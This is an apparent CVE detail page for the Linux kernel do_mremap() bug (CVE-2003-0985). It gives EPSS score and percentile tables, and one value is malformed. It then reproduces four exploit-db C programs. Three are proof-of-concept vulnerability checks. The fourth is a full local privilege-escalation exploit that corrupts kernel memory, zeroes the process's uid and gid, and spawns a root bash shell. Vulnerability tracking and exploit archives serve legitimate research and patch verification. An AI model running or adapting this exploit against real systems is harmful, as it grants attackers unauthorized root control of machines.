CVE-2003-0985 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.01%	–	–
2022-03-27	–	–	4.01%	–	–
2022-04-03	–	–	4.01%	–	–
2022-10-23	–	–	4.01%	–	–
2023-01-01	–	–	4.01%	–	–
2023-01-29	–	–	4.01%	–	–
2023-03-12	–	–	–	0.04%	–
2023-09-03	–	–	–	0.04%	–
2023-09-10	–	–	–	0.04%	–
2024-01-07	–	–	–	0.04%	–
2024-03-03	–	–	–	0.04%	–
2024-03-10	–	–	–	0.04%	–
2024-04-14	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-06-09	–	–	–	0.04%	–
2024-10-27	–	–	–	0.04%	–
2024-12-15	–	–	–	0.04%	–
2024-12-22	–	–	–	0.12%	–
2025-01-19	–	–	–	0.12%	–
2025-01-19	–	–	–	0.12%	–
2025-03-18	–	–	–	–	0.59%
2025-04-06	–	–	–	–	0.57%
2025-04-15	–	–	–	–	0.57%
2025-04-15	–	–	–	–	0.57,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	68%
2022-03-27	69%
2022-04-03	85%
2022-10-23	86%
2023-01-01	85%
2023-01-29	86%
2023-03-12	11%
2023-09-03	1%
2023-09-10	11%
2024-01-07	1%
2024-03-03	11%
2024-03-10	8%
2024-04-14	9%
2024-06-02	9%
2024-06-09	1%
2024-10-27	11%
2024-12-15	12%
2024-12-22	47%
2025-01-19	48%
2025-01-19	48%
2025-03-18	67%
2025-04-06	66%
2025-04-15	67%
2025-04-15	67%

/* * Proof-of-concept exploit code for do_mremap() #2 * * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1". * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/ * * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void *base0; void *base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( "mmap" ); break; } base0 = base1; base1 = (void *) ret; } printf( "created ~%d VMAs\n", i ); base0 += 0x1000; base1 += 0x1000; printf( "now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( "kernel may not be vulnerable\n" ); return( 0 ); } // milw0rm.com [2004-02-18]

/* * Linux kernel mremap() bound checking bug exploit. * * Bug found by Paul Starzetz <paul isec pl> * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <syscall.h> #include <signal.h> #include <time.h> #include <sched.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/wait.h> #include <asm/page.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define str(s) #s #define xstr(s) str(s) #define DSIGNAL SIGCHLD #define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK) #define PAGEADDR 0x2000 #define RNDINT 512 #define NUMVMA (3 * 5 * 257) #define NUMFORK (17 * 65537) #define DUPTO 1000 #define TMPLEN 256 #define __NR_sys_mremap 163 _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e); unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, gid; static volatile int *vma_ro, *vma_rw, *tmp; static volatile unsigned fake_file[16]; void fatal(const char * msg) { printf("\n"); if (!errno) { fprintf(stderr, "FATAL: %s\n", msg); } else { perror(msg); } printf("\nentering endless loop"); fflush(stdout); fflush(stderr); while (1) pause(); } void kernel_code(void * file, loff_t offset, int origin) { int i, c; int *v; if (!file) goto out; __asm__("movl %%esp, %0" : : "m" (c)); c &= 0xffffe000; v = (void *) c; for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) { if (v[i] == uid && v[i+1] == uid) { i++; v[i++] = 0; v[i++] = 0; v[i++] = 0; } if (v[i] == gid) { v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0; break; } } out: dummy++; } void try_to_exploit(void) { int v = 0; v += fops[0]; v += fake_file[0]; kernel_code(0, 0, v); lseek(DUPTO, 0, SEEK_SET); if (geteuid()) { printf("\nFAILED uid!=0"); fflush(stdout); errno =- ENOSYS; fatal("uid change"); } printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout); kill(ppid, SIGUSR1); setresuid(0, 0, 0); sleep(1); printf("\n\n"); fflush(stdout); execl("/bin/bash", "bash", NULL); fatal("burp"); } void cleanup(int v) { victim[DUPTO] = victim[0]; kill(0, SIGUSR2); } void redirect_filp(int v) { printf("\n[!] parent check race... "); fflush(stdout); if (victim[DUPTO] && victim[0] == victim[DUPTO]) { printf("SUCCESS, cought SLAB page!"); fflush(stdout); victim[DUPTO] = (unsigned) & fake_file; signal(SIGUSR1, &cleanup); kill(pid, SIGUSR1); } else { printf("FAILED!"); } fflush(stdout); } int get_slab_objs(void) { FILE * fp; int c, d, u = 0, a = 0; static char line[TMPLEN], name[TMPLEN]; fp = fopen("/proc/slabinfo", "r"); if (!fp) fatal("fopen"); fgets(name, sizeof(name) - 1, fp); do { c = u = a =- 1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, "size-4096")); fclose(fp); return c == 7 ? a - u : -1; } void unprotect(int v) { int n, c = 1; *victim = 0; printf("\n[+] parent unprotected PTE "); fflush(stdout); dup2(0, 2); while (1) { n = get_slab_objs(); if (n < 0) fatal("read slabinfo"); if (n > 0) { printf("\n depopulate SLAB #%d", c++); blah = 0; kill(hpid, SIGUSR1); while (!blah) pause(); } if (!n) { blah = 0; kill(hpid, SIGUSR1); while (!blah) pause(); dup2(0, DUPTO); break; } } signal(SIGUSR1, &redirect_filp); kill(pid, SIGUSR1); } void cleanup_vmas(void) { int i = NUMVMA; while (1) { tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0); if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) { printf("\n[-] ERROR unmapping %d", i); fflush(stdout); fatal("unmap1"); } i--; if (!i) break; tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) { printf("\n[-] ERROR unmapping %d", i); fflush(stdout); fatal("unmap2"); } i--; if (!i) break; } } void catchme(int v) { blah++; } void exitme(int v) { _exit(0); } void childrip(int v) { waitpid(-1, 0, WNOHANG); } void slab_helper(void) { signal(SIGUSR1, &catchme); signal(SIGUSR2, &exitme); blah = 0; while (1) { while (!blah) pause(); blah = 0; if (!fork()) { dup2(0, DUPTO); kill(getppid(), SIGUSR1); while (1) pause(); } else { while (!blah) pause(); blah = 0; kill(ppid, SIGUSR2); } } exit(0); } int main(void) { int i, r, v, cnt; time_t start; srand(time(NULL) + getpid()); ppid = getpid(); uid = getuid(); gid = getgid(); hpid = fork(); if (!hpid) slab_helper(); fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (fops == MAP_FAILED) fatal("mmap fops VMA"); for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++) fops[i] = (unsigned)&kernel_code; for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++) fake_file[i] = (unsigned)fops; vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (vma_ro == MAP_FAILED) fatal("mmap1"); vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (vma_rw == MAP_FAILED) fatal("mmap2"); cnt = NUMVMA; while (1) { r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR); if (r == (-1)) { printf("\n[-] ERROR remapping"); fflush(stdout); fatal("remap1"); } cnt--; if (!cnt) break; r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR); if (r == (-1)) { printf("\n[-] ERROR remapping"); fflush(stdout); fatal("remap2"); } cnt--; if (!cnt) break; } victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (victim != (void *) PAGEADDR) fatal("mmap victim VMA"); v = *victim; *victim = v + 1; signal(SIGUSR1, &unprotect); signal(SIGUSR2, &catchme); signal(SIGCHLD, &childrip); printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout); start = time(NULL); cnt = NUMFORK; v = 0; while (1) { cnt--; v--; dummy += *victim; if (cnt > 1) { __asm__( "pusha \n" "movl %1, %%eax \n" "movl $("xstr(CLONEFL)"), %%ebx \n" "movl %%esp, %%ecx \n" "movl $120, %%eax \n" "int $0x80 \n" "movl %%eax, %0 \n" "popa \n" : : "m" (pid), "m" (dummy) ); } else { pid = fork(); } if (pid) { if (v <= 0 && cnt > 0) { float eta, tm; v = rand() % RNDINT / 2 + RNDINT / 2; tm = eta = (float)(time(NULL) - start); eta *= (float)NUMFORK; eta /= (float)(NUMFORK - cnt); printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ", NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm); fflush(stdout); } if (cnt) { waitpid(pid, 0, 0); continue; } if (!cnt) { while (1) { r = wait(NULL); if (r == pid) { cleanup_vmas(); while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); } } } } } else { cleanup_vmas(); if (cnt > 0) { _exit(0); } printf("\n[+] overflow done, the moment of truth..."); fflush(stdout); sleep(1); signal(SIGUSR1, &catchme); munmap(0, PAGE_SIZE); dup2(0, 2); blah = 0; kill(ppid, SIGUSR1); while (!blah) pause(); munmap((void *)victim, PAGE_SIZE); dup2(0, DUPTO); blah = 0; kill(ppid, SIGUSR1); while (!blah) pause(); try_to_exploit(); while (1) pause(); } } return 0; } // milw0rm.com [2004-01-15]

/* * EDB Note: This will just "test" the vulnerability. * EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* * Proof-of-concept exploit code for do_mremap() * * Copyright (C) 2004 Christophe Devine and Julien Tinnes * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); int main( void ) { void *base; base = mmap( NULL, 8192, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *) 0xC0000000 ); fork(); return( 0 ); } // milw0rm.com [2004-01-06]

/* * EDB Note: This will just "test" the vulnerability. * EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* * Proof of concept code for testing do_mremap() Linux kernel bug. * It is based on the code by Christophe Devine and Julien Tinnes * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since * it avoids any kernel data corruption. * * The following test was done against the Linux kernel 2.6.0. Similar * results were obtained against the kernel 2.4.23 and previous ones. * * buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c * buffer@mintaka:~$ ./mremap_bug * * Base address : 0x60000000 * * 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug * 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug * 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so * 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so * 40016000-40017000 rw-p 00000000 00:00 0 * 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so * 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so * 40156000-40159000 rw-p 00000000 00:00 0 * 60000000-60002000 rw-p 00000000 00:00 0 * bfffd000-c0000000 rwxp ffffe000 00:00 0 * * Remapping at 0x70000000... * * 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug * 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug * 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so * 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so * 40016000-40017000 rw-p 00000000 00:00 0 * 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so * 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so * 40156000-40159000 rw-p 00000000 00:00 0 * 60000000-60002000 rw-p 00000000 00:00 0 * 70000000-70000000 rw-p 00000000 00:00 0 * bfffd000-c0000000 rwxp ffffe000 00:00 0 * * Report : * This kernel appears to be VULNERABLE * * Segmentation fault * buffer@mintaka:~$ */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/mman.h> #include <sys/stat.h> #include <asm/unistd.h> #include <errno.h> #define MREMAP_FIXED 2 #define PAGESIZE 4096 #define VMASIZE (2*PAGESIZE) #define BUFSIZE 8192 #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define MAPS_NO_CHECK 0 #define MAPS_CHECK 1 int mremap_check = 0; void maps_check(char *buf) { if (strstr(buf, "70000000")) mremap_check++; } void read_maps(int fd, char *path, unsigned long flag) { ssize_t nbytes; char buf[BUFSIZE]; if (lseek(fd, 0, SEEK_SET) < 0) { fprintf(stderr, "Unable to lseek %s\n", path); return; } while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) { if (flag & MAPS_CHECK) maps_check(buf); if (write(STDOUT_FILENO, buf, nbytes) != nbytes) { fprintf(stderr, "Unable to read %s\n", path); exit (1); } } } int main(int argc, char **argv) { void *base; char path[16]; pid_t pid; int fd; pid = getpid(); sprintf(path, "/proc/%d/maps", pid); if ( !(fd = open(path, O_RDONLY))) { fprintf(stderr, "Unable to open %s\n", path); return 1; } base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0); printf("\nBase address : 0x%x\n\n", base); read_maps(fd, path, MAPS_NO_CHECK); printf("\nRemapping at 0x70000000...\n\n"); base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *)0x70000000); read_maps(fd, path, MAPS_CHECK); printf("\nReport : \n"); (mremap_check) ? printf("This kernel appears to be VULNERABLE\n\n") : printf("This kernel appears to be NOT VULNERABLE\n\n"); close(fd); return 0; } // milw0rm.com [2004-01-07]